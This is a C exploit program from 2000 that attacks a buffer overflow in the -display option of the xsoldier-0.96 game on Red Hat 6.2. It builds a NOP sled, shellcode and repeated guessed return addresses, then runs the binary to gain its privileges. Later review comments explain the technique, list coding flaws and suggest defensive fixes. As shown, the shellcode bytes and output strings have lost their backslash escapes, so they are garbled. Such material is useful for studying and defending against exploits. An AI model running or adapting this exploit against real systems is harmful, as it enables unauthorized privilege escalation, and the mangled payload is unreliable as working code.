
# Title : Linux xsoldier-0.96 exploit (Red Hat 6.2)
# Published : 2000-12-15
# Author : zorgon


#include <stdio.h>
#include <stdlib.h>

/* Constants used by main() to lay out the crafted "-display" argument. */
#define NOP 0x90        /* i386 single-byte no-op; fills the front of the buffer */
#define BUFSIZE 4408    /* total length of the argument handed to ./xsoldier */
#define OFFSET 0        /* default adjustment added to get_sp() when argv[1] is absent */
#define RANGE 20        /* RANGE*2 trailing bytes are reserved for return-address copies */
 
/*
 * Payload bytes that main() copies in right after the NOP filler.
 *
 * NOTE(review): every `\` escape in this literal was lost when the page was
 * extracted (each byte appears as e.g. "xeb" rather than "\xeb"; the
 * fprintf() strings in main() show the same loss, ending in a bare "n").
 * As printed, the string is therefore ordinary ASCII text, and the
 * strlen(blah) calls in main() measure that mangled text rather than the
 * author's original byte sequence.
 */
unsigned char blah[] =
  "xebx03x5exebx05xe8xf8xffxffxffx83xc6x0dx31xc9xb1x6cx80x36x01x46xe2xfa"
  "xeax09x2ex63x68x6fx2ex72x69x01x80xedx66x2ax01x01"
  "x54x88xe4x82xedx1dx56x57x52xe9x01x01x01x01x5ax80xc2xc7x11"
  "x01x01x8cxbax1fxeexfexfexc6x44xfdx01x01x01x01x88x7cxf9xb9"
  "x47x01x01x01x30xf7x30xc8x52x88xf2xccx81x8cx4cxf9xb9x0ax01"
  "x01x01x88xffx30xd3x52x88xf2xccx81x30xc1x5ax5fx5ex88xedx5c"
  "xc2x91";

/*
 * Returns (approximately) the caller's stack pointer: the inline asm moves
 * %esp into %eax, the register the i386 ABI uses for an integer return value.
 * There is no `return` statement, so the value the caller sees depends on
 * the compiler leaving %eax untouched after the asm — undefined behaviour in
 * standard C and specific to 32-bit x86, the target named in the header.
 * The empty parameter list is an old-style declaration; `(void)` is the
 * modern form.
 */
long get_sp () { __asm__ ("mov %esp, %eax"); }

/*
 * Builds an oversized string and passes it to ./xsoldier as the value of the
 * X "-display" option. Layout of `buffer`: NOP (0x90) filler, then the bytes
 * of `blah`, then 4-byte copies of get_sp()+offset out to BUFSIZE — the
 * classic stack-smash shape. The page does not show where xsoldier stores
 * its -display argument; presumably a fixed-size stack buffer copied without
 * a length check, which is the defect this program depends on. For the
 * overflow to matter the binary must run with more privilege than the
 * caller (a setuid install is the usual reason a game is targeted); the page
 * does not state this, so confirm against the distribution's package.
 *
 * argv[1], when present, is an integer adjustment to the guessed return
 * address. atoi() does no error reporting, so non-numeric input silently
 * becomes 0.
 *
 * Review notes on the code as shown:
 *  - strlen()/memcpy() need <string.h> and execl() needs <unistd.h>; neither
 *    header is included, so the calls rely on implicit declarations.
 *  - No NUL terminator is ever written into `buffer`; execl() treats it as a
 *    C string and reads past the end unless a zero byte happens to occur in
 *    one of the address copies.
 *  - `%x` is given an unsigned long (ret + offset); that only lines up on an
 *    ILP32 target such as the i386 build this was written for.
 *  - execl()'s terminating argument is the integer 0 rather than
 *    (char *)NULL, which is not portable.
 *  - The "n" at the end of each fprintf() string is a `\n` whose backslash
 *    was lost in extraction (same loss as in `blah`).
 *  - main() falls off the end without a return value.
 *
 * From the defender's side the fix belongs in xsoldier: bounds-check (or
 * reject) over-long option values, and avoid installing the binary with
 * elevated privilege at all; a multi-kilobyte argument consisting mostly of
 * 0x90 bytes is also an easy thing for process-auditing tooling to flag.
 */
int
main (int argc, char *argv[])
{
  char buffer[BUFSIZE];
  int i, offset;
  unsigned long ret;

  /* Optional return-address adjustment; defaults to OFFSET (0). */
  if (argc > 1)
    offset = atoi(argv[1]);
  else
    offset = OFFSET;

  /* NOP filler: everything except room for the payload and RANGE*2 tail bytes.
     strlen() returns size_t, so `i` is promoted to unsigned in the comparison;
     harmless here because the bound is positive. */
  for (i = 0; i < (BUFSIZE - strlen (blah) - RANGE*2); i++)
    *(buffer + i) = NOP;

  /* Payload bytes immediately after the filler (no terminator copied). */
  memcpy (buffer + i, blah, strlen (blah));

  /* Fill the remaining RANGE*2 bytes with 4-byte copies of the guessed
     address. Writes are 4 bytes apart; on the i386 target `long` is 4 bytes,
     so the copies tile the tail exactly. */
  ret = get_sp();	
  for (i = i + strlen (blah); i < BUFSIZE; i += 4)
    *(long *) &buffer[i] = ret+offset;

  fprintf(stderr, "xsoldier-0.96 exploit for Red Hat Linux release 6.2 (Zoot)n");
  fprintf(stderr, "zorgon@antionline.orgn");		
  fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]n", ret + offset, offset, BUFSIZE);
  /* Replaces this process with ./xsoldier from the current directory; only
     returns if exec fails, and that return value is not checked. */
  execl ("./xsoldier", "xsoldier", "-display", buffer, 0);
}

